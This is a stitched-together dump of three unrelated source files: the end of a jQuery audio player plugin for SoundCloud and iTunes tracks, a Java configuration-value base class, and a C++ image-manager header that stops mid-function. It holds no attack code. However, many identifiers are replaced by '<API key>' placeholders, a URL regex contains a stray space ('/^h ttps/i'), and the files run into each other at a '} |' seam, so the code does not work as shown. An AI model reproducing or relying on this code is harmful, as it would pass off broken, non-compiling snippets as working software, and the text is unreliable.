// Subscribe (once per page, guarded by the shared counter on `methods`) to
// post-level 'sound' events so dropped media can be routed to a player.
that.addMediaListener = function() {
if(methods.<API key> < 0 && that.options.styles.listenMedia) {
that.post.on('sound',function(data) {
var obj = $(that.post.node);
var allPanels = obj.find(".ut-audio");
var tmp = null;
// Prefer the first empty player, scanning round-robin from the counter.
for(var qq = 0; qq < allPanels.length; qq++) {
var ww = (qq + methods.<API key>) % (allPanels.length);
if(allPanels[ww] && allPanels[ww].utAudio && allPanels[ww].utAudio.options && !allPanels[ww].utAudio.options.data) {
tmp = allPanels[ww];
break;
}
}
// All players occupied: overwrite the next one in rotation.
if(!tmp) {
tmp = allPanels[(methods.<API key>++) % (allPanels.length)];
}
if(tmp) {
tmp.utAudio.options.data = data;
tmp.utAudio.update();
}
});
methods.<API key> = 0;
}
};
that.<API key> = function(newOptions, oldOptions) {
var diff = {newValue:{},oldValue:{}};
var noDiff = {newValue:undefined,oldValue:undefined};
$.each(newOptions, function(i){
if(!(newOptions[i] === oldOptions[i] || (typeof(newOptions[i]) === 'object' && typeof(oldOptions[i]) === 'object' && JSON.stringify(newOptions[i]) === JSON.stringify(oldOptions[i])))){
diff.newValue[i] = newOptions[i];
diff.oldValue[i] = oldOptions[i];
}
});
return $.isEmptyObject(diff.newValue)?noDiff:diff;
};
that.triggerChangeEvent = function(){
var diff = that.<API key>(that.options, that.oldOptions);
$that.trigger(events.change, diff.newValue, diff.oldValue);
that.oldOptions = $.extend(true, {}, that.options);
};
that.<API key> = function(url, callback) {
var apiUrl = (document.location.protocol === 'https:' || (/^h ttps/i).test(url) ? 'https' : 'http') + '://api.soundcloud.com/resolve?url=' + url + '&format=json&consumer_key=' + that.sckey + '&callback=?';
$.getJSON(apiUrl, function(data) {
callback.call(this, data);
});
};
// Resolve an iTunes store URL to track metadata. The numeric track id is
// parsed from the "i=" query parameter; the US store is tried first, then GB.
that.<API key> = function(url,callback) {
var id = false;
var parts = url.split('i=');
if(parts[1]){
// Strip anything after the id (&, ?, or :) and parse as base-10.
id = parseInt(parts[1].split('&')[0].split('?')[0].split(':')[0],10);
}
var serchInStore = function(id, country, successCallback, errorCallback){
var apiUrl = (document.location.protocol === 'https:' || (/^https/i).test(url) ? 'https' : 'http') + '://itunes.apple.com/lookup?media=music&country=' + country + '&id=' + id + '&callback=?';
$.getJSON(apiUrl, function(data) {
if(data && data.results && data.results[0]){
successCallback.call(this, data.results[0]);
} else {
errorCallback.call(this, country);
}
});
};
// Lookup failed in a given country's store: flag the error state.
var canNotFind = function(country){
that.setState('error');
if(console && console.warn){
console.warn("utAaudio can't find the url=" + url + " with id=" + id + " in " + country + " itunes music store");
}
};
var canFind = function(data){
callback.call(this,data);
};
//here we search in UK and US stores
serchInStore(id,'US',canFind,function(country){
canNotFind(country);
serchInStore(id,'GB',canFind,function(country){
canNotFind(country);
});
});
};
// Switch the player's UI state. All styling is class-driven: the container's
// class list is rebuilt from scratch to encode state, editability, service,
// skin, mode, aspect, size and touch capability.
that.setState = function(state) {
that.currents.state = state;
that.ui.container.removeClass().addClass(
[
that.uiNS,
that.stateNS + '-' + state,
that.editableNS + '-' + ((that.options.editable && !that.post.context.player) ? "true" : "false"),
(that.currents.serviceData?(that.serviceNS + "-" + that.currents.serviceData.service_name) : ""),
that.skinNS + '-' + that.options.skin,
that.modeNS + '-' +(that.post.context.player ? "player" : "editor"),
that.aspectNS + '-' + that.aspect,
that.sizeNS + '-' + that.size,
that.touchNS + '-' + (that.isTouch ? "true" : "false"),
'<API key>'
].join(' ')
);
};
// Update the progress bar and time readout for playback position `ms` (in
// milliseconds). The second (redacted) flag appears to mark calls coming
// from the engine's onTimeUpdate; together with the 1s latch set at the
// bottom it throttles those updates — TODO confirm intent.
that.setPlayPos = function(ms, <API key>) {
if(that.<API key> && <API key>) {
return false;
}
if(ms < 0 || !that.currents.serviceData) {
return false;
}
// Clamp to track duration.
if(ms > that.currents.serviceData.duration) {
ms = that.currents.serviceData.duration;
}
if(that.ui.progress){
that.ui.progress.find('.' + that.uiNS + '-progress-playing').css("width", ((ms / that.currents.serviceData.duration) * 100) + "%");
}
var timeInSeconds = Math.round(ms / 1000);
if(ms > 0 || ms === -1){
$that.trigger(events.timeUpdate, timeInSeconds);
}
// Render "elapsed / total" when a duration is known, else clear the label.
if(that.currents.serviceData && that.currents.serviceData.duration) {
var ts = '<span class="'+that.uiNS+'-<API key>">'+that.formatTime(ms) + '</span><span class="'+that.uiNS+'-progress-time-left">' + that.formatTime(that.currents.serviceData.duration) + '</span>';
if(that.ui.time){
that.ui.time.html(ts);
}
} else {
if(that.ui.time){
that.ui.time.html("");
}
}
// Latch for 1s; see the guard at the top of this function.
that.<API key> = true;
setTimeout(function(){
if(that){
that.<API key> = false;
}
}, 1000);
return true;
};
// Format a millisecond duration as "m:ss", or "h:mm:ss" once it reaches an
// hour (minutes are only zero-padded when hours are shown).
that.formatTime = function(ms) {
    var hours = Math.floor(ms / (60 * 60 * 1000));
    var minutes = Math.floor((ms / 60000) % 60);
    var seconds = Math.floor((ms / 1000) % 60);
    var pieces = [];
    if (hours > 0) {
        pieces.push(hours);
        pieces.push(minutes < 10 ? '0' + minutes : minutes);
    } else {
        pieces.push(minutes);
    }
    pieces.push(seconds < 10 ? '0' + seconds : seconds);
    return pieces.join(':');
};
// (Re)populate every UI element from the current service metadata and wire
// up play/seek/hover interactions. Safe to call with no metadata: `sed`
// falls back to an empty object.
that.updateUiContent = function() {
var sed = that.currents.serviceData || {};
// Artwork is applied only after the image has actually loaded.
if(that.ui.artwork && sed.artwork_url) {
var img = new window.Image();
img.onload = function(){
that.ui.artwork.css("backgroundImage", "url(" + sed.artwork_url + ")");
};
img.src = sed.artwork_url;
}
if(that.ui.play) {
that.ui.play.html('<span class="icon_spinner '+that.uiNS+'-seek-icon"></span><span class="icon_play '+that.uiNS+'-play-icon"></span><span class="icon_pause '+that.uiNS+'-pause-icon"></span>');
// Toggle: pause unless we are in a resumable state (launch/finish/pause).
that.ui.play.on('click',function() {
if(that.currents.state !== 'launch' && that.currents.state !== 'finish' && that.currents.state !== 'pause'){
that.utPause();
} else {
that.utPlay();
}
});
// Empty touch handlers — presumably to make the element clickable on
// some touch browsers; TODO confirm they are still needed.
that.ui.play.on('touchend',function(){});
that.ui.play.on('touchstart',function(){});
}
if(that.ui.title) {
that.ui.title.html(sed.title || '');
that.ui.title.off('click').on('click', function (e) {
e.stopPropagation();
});
}
// Clicking the error overlay returns the player to the launch state.
if(that.ui.error) {
that.ui.error.html("<div>" + (that.options.i18n.error || "Error") + "</div>");
that.ui.error.off('click').on('click', function (event) {
event.stopPropagation();
event.preventDefault();
that.setState("launch");
});
}
// NOTE(review): this markup string leaves two spans unclosed; browsers
// auto-close them, but it looks unintentional — confirm.
if(that.ui.progress) {
that.ui.progress
.html('<span class="'+that.uiNS+'-progress-playing"></span><span class="'+that.uiNS+'-progress-marker"><span class="'+that.uiNS+'-<API key>"></span><span class="'+that.uiNS+'-progress-time">');
}
// Hover marker with time tooltip: pointer devices only.
if(!that.isTouch && that.ui.progress) {
that.ui.progress
.off('mouseenter')
.on('mouseenter', function(){
if(that.currents.state === 'play' || that.currents.state === 'pause'){
that.ui.progress.find('.'+that.uiNS+'-progress-marker').addClass(that.uiNS+'-<API key>');
}
})
.off('mouseleave')
.on('mouseleave', function(){
that.ui.progress.find('.'+that.uiNS+'-progress-marker').removeClass(that.uiNS+'-<API key>');
})
.off('mousemove')
.on('mousemove', function(e){
var pos = e.pageX - that.ui.progress.offset().left;
var time = (that.currents.serviceData.duration || 0)/that.ui.progress.width() * pos;
that.ui.progress.find('.'+that.uiNS+'-progress-marker').css('left',pos + 'px');
that.ui.progress.find('.'+that.uiNS+'-<API key>').html(that.formatTime(time));
});
}
// Translate a click/touch X coordinate into a relative seek position.
var _seekPlay = function(e) {
var oo = that.ui.progress.offset();
var px = e.pageX ? e.pageX : (e.originalEvent && e.originalEvent.pageX ? e.originalEvent.pageX : (e.originalEvent.touches && e.originalEvent.touches[0] && e.originalEvent.touches[0].pageX ? e.originalEvent.touches[0].pageX : 0));
var pos = (px - parseInt(oo.left, 10))/that.ui.progress.width();
if(that.currents.state === 'play' || that.currents.state === 'pause'){
$that.utAudioEngine("seek", pos);
}
};
if(that.ui.progress){
that.ui.progress.on("touchstart mousedown", function(e) {
_seekPlay(e);
});
}
if(that.ui.source) {
that.ui.source
.html('<span class="icon_'+sed.service_name +' '+that.uiNS+'-source-icon"></span>')
.prop('target','_blank')
.prop('title','listen on '+sed.service_name);
}
// staticLink (if configured) overrides the service's own permalink.
if(that.ui.source) {
that.ui.source.prop('href',that.options.styles.staticLink ? that.options.styles.staticLink : sed.source);
}
that.setPlayPos(0);
};
// Seek to relative position `pos` (0..1); ignored unless playing or paused.
that.seek = function(pos) {
    var state = that.currents.state;
    if(state === 'play' || state === 'pause') {
        $that.utAudioEngine("seek", pos);
    }
};
// Work out which backing service the configured data refers to: an explicit
// `service` field wins, otherwise the URL is sniffed. Returns 'soundcloud',
// 'itunes', or false after flagging the error state.
that.getServiceName = function(){
    var data = that.options.data;
    if(data && data.service) {
        return data.service;
    }
    var url = (data && data.url) ? data.url.toLowerCase() : '';
    if(url.indexOf('soundcloud') !== -1) {
        return 'soundcloud';
    }
    if(url.indexOf('itunes.apple') !== -1) {
        return 'itunes';
    }
    var error = 'Something went wrong with defining service name that you want to play';
    console.error(error, data);
    that.setState('error', error);
    return false;
};
// Normalize the raw service response into the internal serviceData shape
// (title/source/artwork_url/duration/artist/trackName). iTunes previews are
// a fixed 30s clip. NOTE(review): if getServiceName() returns false,
// currents.serviceData stays unset and the last line would throw — confirm
// callers only reach here for a known service.
that.formatServiceData = function(data) {
if (that.getServiceName() === 'soundcloud') {
that.currents.serviceData = {
title: data.title,
source: data.permalink_url,
// Swap SoundCloud's "-large" artwork for the 500px variant.
artwork_url: (data.artwork_url ? data.artwork_url : '').replace(/\-large\./ig, "-t500x500."),
duration: data.duration,
artist: (data.user && data.user.username ? data.user.username : ""),
trackName: data.title
};
} else if(that.getServiceName() === 'itunes') {
that.currents.serviceData = {
title: data.artistName + ' - ' + data.trackName,
source: data.trackViewUrl,
// Request the 600px artwork instead of the 100px thumbnail.
artwork_url: (data.artworkUrl100 ? data.artworkUrl100 : '').replace("100x100","600x600"),
duration: 30000,
artist: data.artistName,
trackName: data.trackName
};
}
that.currents.serviceData.service_name = that.getServiceName();
};
// Fetch track metadata for the configured data, invoking `callback` with the
// raw service response. Prefers cached appData; otherwise dispatches to the
// SoundCloud or iTunes resolver. A 15s watchdog flips to the error state if
// nothing arrived.
that.requestServiceData = function(callback) {
var errorTimeOut = setTimeout(function(){
if(that && (!that.currents || !that.currents.serviceData)){
that.setState('error', "We can't get data to play this track in 15 sec");
}
}, 15000);
if(that.options.data.appData){
clearTimeout(errorTimeOut);
callback(that.options.data.appData);
} else if (that.getServiceName() === 'soundcloud') {
that.<API key>(that.options.data.url, function(data) {
clearTimeout(errorTimeOut);
callback(data);
});
} else if (that.getServiceName() === 'itunes') {
that.<API key>(that.options.data.url, function(data) {
clearTimeout(errorTimeOut);
callback(data);
});
}
};
// Build the playback config from resolved service data and hand it to the
// utAudioEngine plugin: picks the stream URL/codec, installs all engine
// callbacks (state transitions + events), then refreshes the UI.
that.<API key> = function(data) {
var type, url;
if (that.getServiceName() === 'soundcloud') {
var uri = data.stream_url;// ? data.stream_url : data.uri;
// Append the consumer key, using ? or & as appropriate.
url = uri + (/\?/.test(uri) ? '&' : '?') + 'consumer_key=' + that.sckey;
type = "mp3";
} else {
// iTunes: 30s m4a preview clip.
url = data.previewUrl;
type = "m4a";
}
that.formatServiceData(data);
that.<API key> = {
duration: that.currents.serviceData && that.currents.serviceData.duration ? that.currents.serviceData.duration : false,
url: url,
type: type,
// autoPause: that.options.styles.autoPause,
onReady: function() {
that.setPlayPos(0);
},
onPlay: function() {
// if(that.post && that.post.stopAllOther && that.options.styles.autoPause) {
// that.post.stopAllOther();
that.setState('play');
$that.trigger(events.play);
},
onPause: function() {
that.setState('pause');
$that.trigger(events.pause);
},
onStop: function() {
that.setState('finish');
$that.trigger(events.stop);
that.setPlayPos(0);
},
onFinish: function() {
that.setState('finish');
$that.trigger(events.finish);
that.setPlayPos(0);
},
onSeekStart: function() {
// Only meaningful mid-playback; ignore in launch/finish/empty states.
if(that.currents.state !== "launch" && that.currents.state !== "finish" && that.currents.state !== "empty") {
that.setState('seek');
$that.trigger(events.seek);
}
},
onSeekEnd: function() {
if(that.currents.state !== "launch" && that.currents.state !== "finish" && that.currents.state !== "empty") {
// if(that.post && that.post.stopAllOther && that.options.styles.autoPause) {
// that.post.stopAllOther();
that.setState("play");
}
},
onTimeUpdate: function(pos) {
that.setPlayPos(pos, true);
},
onError: function(message) {
$that.trigger(events.error, message);
that.setState('error');
}
};
that.updateUiContent();
if($that.utAudioEngine) {
that.setState('launch');
$that.utAudioEngine(that.<API key>);
// Defer the "ready" notifications until after the engine call returns.
setTimeout(function() {
$that.trigger(events.mediaReady, that.currents.serviceData);
that.triggerChangeEvent();
}, 10);
} else {
that.setState("error", "Sound Player !!! The library not found.");
}
};
// Full (re)build of the player: restore persisted data, validate the id,
// recreate the DOM skeleton, classify aspect/size, and either start loading
// the configured track or show the empty state.
that.update = function(){
that.currents = {
id: that.options.id || $that.attr('id'),
sourceEmbedData: null,
state: 'loading'
};
$that.addClass("ut-audio");
// Previously saved data (post storage) wins only when no data was passed in.
var storage_data = that.post.storage[that.storageNS+that.currents.id];
if(storage_data && !that.options.data) {
that.options.data = JSON.parse(storage_data);
}
// A bare string is shorthand for {url: string}.
if(typeof(that.options.data) === 'string') {
that.options.data = {url:that.options.data};
}
if(!that.currents.id) {
console.error('utAudio: Please specify an id of your audio container. Example: "<div id="myPlayer1"></div>"');
return;
} else if($('[id="'+that.currents.id+'"]').length > 1){
console.error('utAudio: Your audio container should have unique id. Now, more then one element have id = ',that.currents.id);
return;
}
// Stop any previous playback before rebuilding.
if($that.utAudioEngine) {
that.utStop();
}
that.ui = {};
// The overlay children are absolutely positioned, so the container must
// establish a positioning context.
if($that.css('position') !== "relative" && $that.css('position') !== "absolute"){
$that.css('position','relative');
if(console && console.warn) {
console.warn('Your container (id='+that.currents.id+') css position was set as "relative" as requirement of utAudio component. You can set it "absolute" or "relative" in the css to avoid this warning in console');
}
}
// Rebuild the UI skeleton from scratch, honoring the per-element ui flags.
$that.find('.'+that.uiNS).remove();
that.ui.container = $('<div class="'+that.uiNS+'"></div>').appendTo($that);
that.ui.error = $('<div class="'+that.uiNS+'-error"></div>').appendTo(that.ui.container);
that.ui.loading = $('<div class="'+that.uiNS+'-loading"></div>').append('<div class="icon_spinner '+that.uiNS+'-error-icon"></div>').appendTo(that.ui.container);
if(that.options.ui.artwork) { that.ui.artwork = $('<div class="'+that.uiNS+'-artwork">' ).appendTo(that.ui.container);}
if(that.options.ui.title) { that.ui.title = $('<div class="'+that.uiNS+'-title">' ).appendTo(that.ui.container);}
if(that.options.ui.play) { that.ui.play = $('<div class="'+that.uiNS+'-play needsclick">' ).appendTo(that.ui.container);}
if(that.options.ui.progress) { that.ui.progress = $('<div class="'+that.uiNS+'-progress">' ).appendTo(that.ui.container);}
if(that.options.ui.time) { that.ui.time = $('<div class="'+that.uiNS+'-time">' ).appendTo(that.ui.container);}
if(that.options.ui.source) { that.ui.source = $('<a class="'+that.uiNS+'-source">' ).appendTo(that.ui.container);}
if(that.options.editable) {
that.ui.add = $('<a class="'+that.uiNS+'-add icon_sound ut-media-button ut-button"></a>')
.html(that.options.i18n.add)
.appendTo(that.ui.container)
.on('click', that.onAddClick);
that.ui.remove = $('<a class="'+that.uiNS+'-remove icon_trash"></a>')
.html(that.options.i18n.change)
.appendTo(that.ui.container)
.on('click', that.onRemoveClick);
}
that.aspect = 'square'; //TODO - make it more clear
if($that.width() > $that.height()*1.25) { that.aspect = 'horizontal'; }
if($that.width()*1.25 < $that.height()) { that.aspect = 'vertical'; }
that.size = 'middle'; //TODO - make it more clear
if($that.width() > 300 || $that.height() > 300) { that.size = 'big'; }
if($that.width() <= 200 || $that.height() <= 200) { that.size = 'small'; }
if(that.post) {
that.post.on('pause',that.utPause);
}
if(that.options.data && (that.options.data.appData || that.options.data.url)) {
that.setState("loading");
that.requestServiceData(that.<API key>);
} else {
that.setState("empty");
}
};
// "Add sound" button: fire a cancelable buttonClick event; unless a handler
// prevented it, open the media dialog and swallow the DOM event.
that.onAddClick = function(event) {
    var clickEvent = $.Event(events.buttonClick);
    $that.trigger(clickEvent, "add");
    if(clickEvent.isDefaultPrevented()) {
        return;
    }
    that.utDialog({});
    event.stopPropagation();
    event.preventDefault();
};
// "Remove/change sound" button: same cancelable-event protocol as
// onAddClick, then reopen the media dialog.
that.onRemoveClick = function(event) {
    var clickEvent = $.Event(events.buttonClick);
    $that.trigger(clickEvent, "remove");
    if(clickEvent.isDefaultPrevented()) {
        return;
    }
    event.stopPropagation();
    event.preventDefault();
    that.utDialog({});
};
// Clear this player's persisted data and re-render it in the empty state.
that.utEmpty = function() {
    var storageKey = that.storageNS + that.currents.id;
    that.post.storage[storageKey] = null;
    that.post.save();
    that.options.data = null;
    that.update();
};
// Start (or resume) playback; with autoPause enabled, silence every other
// player in the post first. Shows the seek spinner until onPlay fires.
that.utPlay = function(v) {
    var post = that.post;
    if(post && post.stopAllOther && that.options.styles.autoPause) {
        post.stopAllOther();
    }
    that.setState("seek");
    if($that.utAudioEngine) {
        $that.utAudioEngine("play", v);
    }
};
// Pause playback; no-op when the engine plugin is unavailable.
that.utPause = function() {
    if(!$that.utAudioEngine) {
        return;
    }
    $that.utAudioEngine("pause");
};
// Stop playback and reset the position display (-1 resets without firing
// a timeUpdate for 0).
that.utStop = function() {
if($that.utAudioEngine) {
$that.utAudioEngine("stop");
}
that.setPlayPos(-1);
};
// Forward a volume change to the engine; no-op without the engine plugin.
that.utVolume = function(v) {
    if(!$that.utAudioEngine) {
        return;
    }
    $that.utAudioEngine("volume", v);
};
// Tear the player down: drop persisted data, empty the container, and null
// the closure reference so pending timeouts see `that` as gone.
that.utDestroy = function() {
that.post.storage[that.storageNS+that.currents.id] = null;
that.post.save();
$that.empty();
that = null;
};
// Public wrapper used by the plugin's `update` method.
that.utUpdate = function() {
that.update();
};
// Open the platform's sound-picker dialog. On success the selection is
// applied, persisted to post storage, and mediaAdd is fired; cancellation
// (empty result or the cancel callback) fires dialogCancel.
that.utDialog = function(opt) {
var options = {
inputTypes: ['search'],
label: that.options.i18n.dialogLabel
};
if(!$.isEmptyObject(opt)) {
options = $.extend(true, options, opt);
}
$that.trigger(events.dialogOpen);
that.post.dialog("sound", options, function(data) {
if(!data){
$that.trigger(events.dialogCancel);
} else {
that.options.data = data;
that.update();
that.post.storage[that.storageNS+that.currents.id] = JSON.stringify(data);
that.post.save();
$that.trigger(events.mediaAdd);
}
}, function(){
$that.trigger(events.dialogCancel);
});
};
// Toggle post-level media listening. Disabling also unsubscribes the shared
// 'sound' handler and resets the shared counter so a later enable can
// re-register it.
that.listenMedia = function(isAllow) {
if(isAllow) {
that.options.styles.listenMedia = true;
that.addMediaListener();
} else {
that.options.styles.listenMedia = false;
that.post.off('sound');
methods.<API key> = -1;
}
};
that.oldOptions = $.extend(true, {}, that.options);
that.initialized = true;
if(that.post) {
setTimeout(function() {
that.update();
$that.trigger(events.ready, {id:that.options.id, data:that.options.data});
}, 0);
that.addMediaListener();
}
});
return this;
},
empty: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utEmpty.call(this);
}
});
return this;
},
play: function(v) {
this.each(function() {
if(this.utAudio) {
this.utAudio.utPlay.call(this,v);
}
});
return this;
},
pause: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utPause.call(this);
}
});
return this;
},
stop: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utStop.call(this);
}
});
return this;
},
seek: function(pos) {
this.each(function() {
if(this.utAudio) {
this.utAudio.seek.call(this, pos);
}
});
return this;
},
volume: function(v) {
this.each(function() {
if(this.utAudio) {
this.utAudio.utVolume.call(this,v);
}
});
return this;
},
update: function() {
this.each(function() {
if(this.utAudio && this.utAudio.utUpdate){
this.utAudio.utUpdate.call(this);
}
});
return this;
},
remove: function() {
methods.destroy.apply(this, arguments);
},
destroy: function() {
this.each(function() {
if(this.utAudio) {
this.utAudio.utDestroy.call(this);
}
});
return this;
},
dialog: function(options) {
this.each(function() {
if(this.utAudio) {
this.utAudio.utDialog.call(this, options);
}
});
return this;
},
listenMedia: function(isAllow) {
this.each(function() {
if(this.utAudio) {
this.utAudio.listenMedia.call(this, isAllow);
}
});
return this;
}
};
// Standard jQuery plugin dispatcher: a string selects a method from
// `methods` (remaining args forwarded); an object (or nothing) runs init.
$.fn.utAudio = function(method) {
if (methods[method]) {
return methods[method].apply(this, Array.prototype.slice.call(arguments, 1));
} else if (typeof method === 'object' || !method) {
methods.init.apply(this, arguments);
} else {
$.error('Method ' + method + ' does not exist on $.utAudio');
}
return this;
};
})(window.$ || window.Zepto || window.jq);
} |
package aphelion.shared.gameconfig;
import aphelion.shared.swissarmyknife.WeakList;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
*
*
* @author Joris
*/
// Base class for a single typed config value bound to a selection and a yaml
// key. Subclasses convert raw yaml objects via newValue(); registered
// ChangeListeners (held weakly) are notified when the value changes.
public abstract class <API key>
{
final ConfigSelection selection;
final String key;
// True once a real value (as opposed to a default) has been applied.
protected boolean set;
// Weak references: listeners are dropped automatically once collected.
private final WeakList<ChangeListener> listeners = new WeakList<>();
<API key>(@Nonnull ConfigSelection selection, @Nonnull String key)
{
this.selection = selection;
this.key = key;
}
public boolean isSet()
{
return set;
}
// Notify every still-reachable listener that this value changed.
protected final void fireChangeListener()
{
for (ChangeListener listener : listeners)
{
listener.<API key>(this);
}
}
// Register a listener (weakly held); also purges dead references.
public void <API key>(@Nonnull ChangeListener listener)
{
listeners.cleanup();
listeners.add(listener);
}
// Register a listener and immediately invoke it with the current value.
public void <API key>(@Nonnull ChangeListener listener)
{
<API key>(listener);
listener.<API key>(this);
}
// Unregister a listener; also purges dead references.
public void <API key>(@Nullable ChangeListener listener)
{
listeners.remove(listener);
listeners.cleanup();
}
/** A new value is coming from yaml.
* @return true if the new value is different from the old one
*/
abstract boolean newValue(@Nullable Object value);
public static interface ChangeListener
{
void <API key>(@Nonnull <API key> val);
}
public static interface Factory
{
<API key> create(@Nonnull ConfigSelection selection, @Nonnull String key);
}
}
#pragma once
#include "math.h"
#include "CalculatorCRC32.h"
#include "../../Common/DocxFormat/Source/SystemUtility/File.h"
#include "FontPicker.h"
using namespace NSFontCutter;
#ifndef AVSINLINE
#define AVSINLINE __forceinline
#endif
#include "../../<API key>/PPTXWriter/FileDownloader.h"
#include "WMFToImageConverter.h"
#include "../../Common/MediaFormatDefine.h"
namespace NSShapeImageGen
{
const long c_nMaxImageSize = 2000;
// Copy strExists to strNew, removing any existing destination first so
// CopyFileEx cannot fail on an already-present (possibly read-only) file.
// lpFunc/lpData: optional progress callback forwarded to CopyFileEx.
static BOOL _CopyFile(CString strExists, CString strNew, LPPROGRESS_ROUTINE lpFunc, LPVOID lpData)
{
::DeleteFile(strNew);
return ::CopyFileEx(strExists, strNew, lpFunc, lpData, FALSE, 0);
}
// Output/source format classification for a converted image.
enum ImageType
{
itJPG = 0, // lossy raster output
itPNG = 1, // lossless raster output (default for anything with alpha)
itVIF = 2,
itWMF = 3, // Windows metafile source
itEMF = 4 // enhanced metafile source
};
// Value type describing one image registered with CImageManager: its output
// format, sequential id (used to build "imageN.ext" names) and validity.
class CImageInfo
{
public:
NSShapeImageGen::ImageType m_eType;
LONG m_lID; // -1 until assigned by the manager
bool m_bValid;
CImageInfo()
{
m_eType = itJPG;
m_lID = -1;
m_bValid = true;
}
CImageInfo(const CImageInfo& oSrc)
{
*this = oSrc;
}
CImageInfo& operator=(const CImageInfo& oSrc)
{
m_eType = oSrc.m_eType;
m_lID = oSrc.m_lID;
m_bValid = oSrc.m_bValid;
return *this;
}
// Full path "<strMedia>\imageN.jpg|png" (raster extensions only).
AVSINLINE CString GetPath(const CString& strMedia)
{
CString strExt = _T("");
strExt.Format(_T("\\image%d.%s"), m_lID, (itJPG == m_eType) ? _T("jpg") : _T("png"));
return strMedia + strExt;
}
// Bare file name "imageN.<ext>", preserving wmf/emf extensions.
AVSINLINE CString GetPath2()
{
CString _strExt = _T("png");
switch (m_eType)
{
case itJPG:
_strExt = _T("jpg");
break;
case itWMF:
_strExt = _T("wmf");
break;
case itEMF:
_strExt = _T("emf");
break;
default:
break;
}
CString strExt = _T("");
strExt.Format(_T("image%d.%s"), m_lID, _strExt);
return strExt;
}
};
class CImageManager
{
public:
CAtlMap<CString, CImageInfo> m_mapImagesFile;
CAtlMap<DWORD, CImageInfo> m_mapImageData;
CAtlArray<void*> m_listDrawings;
CAtlList<CImageInfo> m_listImages;
CString m_strDstMedia;
LONG m_lMaxSizeImage;
LONG m_lNextIDImage;
CCalculatorCRC32 m_oCRC;
LONG m_lDstFormat;
#ifdef <API key>
<API key>::CImageExt m_oExt;
#endif
public:
// Initialize an empty manager; ids start at 0 and the size cap defaults to
// the global c_nMaxImageSize.
CImageManager()
{
m_strDstMedia = _T("");
m_lMaxSizeImage = c_nMaxImageSize;
m_lNextIDImage = 0;
m_lDstFormat = 0;
}
// Reset all per-document state (caches, id counter, destination folder).
// NOTE(review): the size cap is reset to 800 here, not c_nMaxImageSize
// (2000) as in the constructor — confirm this difference is intentional.
AVSINLINE void NewDocument()
{
m_strDstMedia = _T("");
m_lMaxSizeImage = 800;
m_lNextIDImage = 0;
m_mapImageData.RemoveAll();
m_mapImagesFile.RemoveAll();
m_listImages.RemoveAll();
}
public:
// Write the manager's state (settings + both lookup caches) through the
// given writer. Must be kept in sync with Deserialize below.
template <typename T>
void Serialize(T* pWriter)
{
pWriter->WriteINT(m_lMaxSizeImage);
pWriter->WriteINT(m_lNextIDImage);
pWriter->WriteINT(m_lDstFormat);
pWriter->WriteString(m_strDstMedia);
// File-path -> info cache: count followed by (key, type, id, valid) tuples.
int lCount = (int)m_mapImagesFile.GetCount();
pWriter->WriteINT(lCount);
POSITION pos = m_mapImagesFile.GetStartPosition();
while (NULL != pos)
{
CAtlMap<CString, CImageInfo>::CPair* pPair = m_mapImagesFile.GetNext(pos);
pWriter->WriteString(pPair->m_key);
pWriter->WriteINT((int)pPair->m_value.m_eType);
pWriter->WriteINT((int)pPair->m_value.m_lID);
pWriter->WriteBYTE(pPair->m_value.m_bValid ? 1 : 0);
}
// CRC -> info cache, same tuple layout with a ULONG key.
lCount = (int)m_mapImageData.GetCount();
pWriter->WriteINT(lCount);
pos = m_mapImageData.GetStartPosition();
while (NULL != pos)
{
CAtlMap<DWORD, CImageInfo>::CPair* pPair = m_mapImageData.GetNext(pos);
pWriter->WriteULONG(pPair->m_key);
pWriter->WriteINT((int)pPair->m_value.m_eType);
pWriter->WriteINT((int)pPair->m_value.m_lID);
pWriter->WriteBYTE(pPair->m_value.m_bValid ? 1 : 0);
}
}
// Restore state previously written by Serialize (same field order).
template <typename T>
void Deserialize(T* pReader)
{
m_lMaxSizeImage = pReader->GetLong();
m_lNextIDImage = pReader->GetLong();
m_lDstFormat = pReader->GetLong();
m_strDstMedia = pReader->GetString2();
m_mapImageData.RemoveAll();
m_mapImagesFile.RemoveAll();
// File-path -> info cache.
LONG lCount = pReader->GetLong();
for (LONG i = 0; i < lCount; ++i)
{
CString sKey = pReader->GetString2();
CImageInfo oInfo;
oInfo.m_eType = (NSShapeImageGen::ImageType)pReader->GetLong();
oInfo.m_lID = pReader->GetLong();
oInfo.m_bValid = pReader->GetBool();
m_mapImagesFile.SetAt(sKey, oInfo);
}
// CRC -> info cache.
lCount = pReader->GetLong();
for (LONG i = 0; i < lCount; ++i)
{
DWORD dwKey = (DWORD)pReader->GetULong();
CImageInfo oInfo;
oInfo.m_eType = (NSShapeImageGen::ImageType)pReader->GetLong();
oInfo.m_lID = pReader->GetLong();
oInfo.m_bValid = pReader->GetBool();
m_mapImageData.SetAt(dwKey, oInfo);
}
}
public:
// Register an in-memory image frame. A negative height denotes a vertically
// flipped image: the frame is flipped and y/height are normalized in place.
// Returns an invalid (default) CImageInfo when punkImage is NULL.
CImageInfo WriteImage(IUnknown* punkImage, double& x, double& y, double& width, double& height)
{
CImageInfo info;
if (NULL == punkImage)
return info;
if (height < 0)
{
FlipY(punkImage);
height = -height;
y -= height;
}
return GenerateImageID(punkImage, max(1.0, width), max(1.0, height));
}
// Register an image given by local path or URL. Remote sources (www/http/
// https/ftp near the start of the string) are downloaded first and cached
// in m_mapImagesFile so each URL is fetched only once.
CImageInfo WriteImage(CString& strFile, double& x, double& y, double& width, double& height)
{
	bool bIsDownload = false;
	int n1 = strFile.Find(_T("www"));
	int n2 = strFile.Find(_T("http"));
	int n3 = strFile.Find(_T("ftp"));
	int n4 = strFile.Find(_T("https"));
	// Scheme marker must appear within the first 10 characters.
	if (((n1 >= 0) && (n1 < 10)) || ((n2 >= 0) && (n2 < 10)) || ((n3 >= 0) && (n3 < 10)) || ((n4 >= 0) && (n4 < 10)))
		bIsDownload = true;
	if (bIsDownload)
	{
		// Normalize backslashes, then restore the "//" after the scheme.
		// (Fixed: these three Replace calls were truncated mid-literal in
		// the source — the "//" inside the replacement strings had been
		// stripped, leaving unterminated literals; reconstructed from the
		// surviving "http:/" -> "http:" fragments.)
		CString strFile1 = strFile;
		strFile1.Replace(_T("\\"), _T("/"));
		strFile1.Replace(_T("http:/"), _T("http://"));
		strFile1.Replace(_T("https:/"), _T("https://"));
